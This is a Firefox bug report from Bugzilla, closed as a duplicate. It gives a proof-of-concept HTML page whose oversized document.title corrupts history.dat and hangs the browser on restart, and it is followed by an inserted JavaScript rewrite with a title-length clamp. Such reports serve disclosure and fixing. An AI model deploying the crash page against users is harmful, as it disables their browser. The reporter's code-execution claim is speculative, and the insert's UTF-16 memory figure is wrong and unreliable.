Closed Bug 324020 Opened 19 years ago Closed 19 years ago

buffer overflow with javascript, causes crash and Firefox never starts again

Categories

(Firefox :: General, defect)

x86
Windows XP
defect
Not set
critical


RESOLVED DUPLICATE of bug 319004

People

(Reporter: maksrules, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5

<html><head><title>heh</title><script type="text/javascript">
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

This small HTML page will show a CLICK ME link, which calls a JavaScript routine. This routine overflows an internal buffer and overwrites something in the program. The browser still works until you close it and restart it. Then the browser "hangs" and doesn't seem to work. In Task Manager it shows as taking 53 MB instead of the usual 18. The CPU is 100% busy.

Reinstalling Firefox doesn't help. It appears that in the Application Data folder (application data/mozilla/firefox/profiles/...) the history.dat is modified. When history.dat is deleted, Firefox recovers. Also, history.dat increases in size by over 9 MB.

Apparently, the buffer is overflowed. Malicious software could use this to modify the code of Firefox while it is running. This can be very insecure.

This bug was found on Firefox 1.0.7 and inspected in Firefox 1.5. A friend showed me this thing.

Reproducible: Always

Steps to Reproduce:
1. In a blank text file, print this:

<html><head><title>heh</title><script type="text/javascript">
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>


2. Save it with the .html extension
3. Exit and open it. Then click "CLICK ME"



Expected Results:  
Buffer overflow should be detected and prevented.

Works on Firefox 1.0.7 and 1.5. A friend showed me this bug - he found it on the internet, securitylab.ru
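As an added example (not part of the bug report and not Firefox code): the routine from the report rewritten as a plain function, so the size of the title it produces can be measured without a browser, together with a length cap of the kind a history store could apply before persisting a title. The cap value MAX_TITLE_CHARS is an assumption chosen for illustration, not a Firefox setting.

```javascript
// Same construction as the reporter's ex(): a 5000-char chunk of "A",
// then the chunk appended to itself 500 more times.
function buildTitle(chunkLen = 5000, repeats = 500) {
  let buffer = "";
  for (let i = 0; i < chunkLen; i++) {
    buffer += "A";
  }
  let buffer2 = buffer;
  for (let i = 0; i < repeats; i++) {
    buffer2 += buffer;
  }
  return buffer2; // chunkLen * (repeats + 1) characters
}

// Expected title size without building it, so the figure can be checked
// independently of the string itself.
function expectedTitleLength(chunkLen = 5000, repeats = 500) {
  return chunkLen * (repeats + 1);
}

// Assumed cap for what a history store should persist per page title.
// The value is illustrative; a real store would pick its own budget.
const MAX_TITLE_CHARS = 4096;

// Truncate an untrusted, page-controlled title before writing it to
// persistent storage, so one page cannot bloat the store with megabytes.
function clampTitle(title, maxChars = MAX_TITLE_CHARS) {
  if (typeof title !== "string") {
    return "";
  }
  if (title.length <= maxChars) {
    return title;
  }
  return title.slice(0, maxChars);
}

// Decide whether a title exceeds the persistence budget; this is the
// check a store could log or count as a hostile page.
function exceedsTitleBudget(title, maxChars = MAX_TITLE_CHARS) {
  return typeof title === "string" && title.length > maxChars;
}

// Stand-alone run: measure the title and show the clamped size.
// Uses document.title only when a DOM is present (browser), as the
// original PoC does; under Node this branch is skipped.
function demo() {
  const title = buildTitle();
  const summary = {
    producedChars: title.length,
    producedMiB: Number((title.length / (1024 * 1024)).toFixed(2)),
    storedChars: clampTitle(title).length,
    overBudget: exceedsTitleBudget(title),
  };
  if (typeof document !== "undefined") {
    document.title = clampTitle(title);
  }
  return summary;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The string the page builds is 2,505,000 characters (about 2.39 MiB of UTF-16 in memory, 2.39 MB of bytes if stored as single-byte text), which is the kind of payload that ends up in the profile's history file; the clamp shows the obvious mitigation at the point where a page-controlled value is persisted.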

*** This bug has been marked as a duplicate of 319004 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE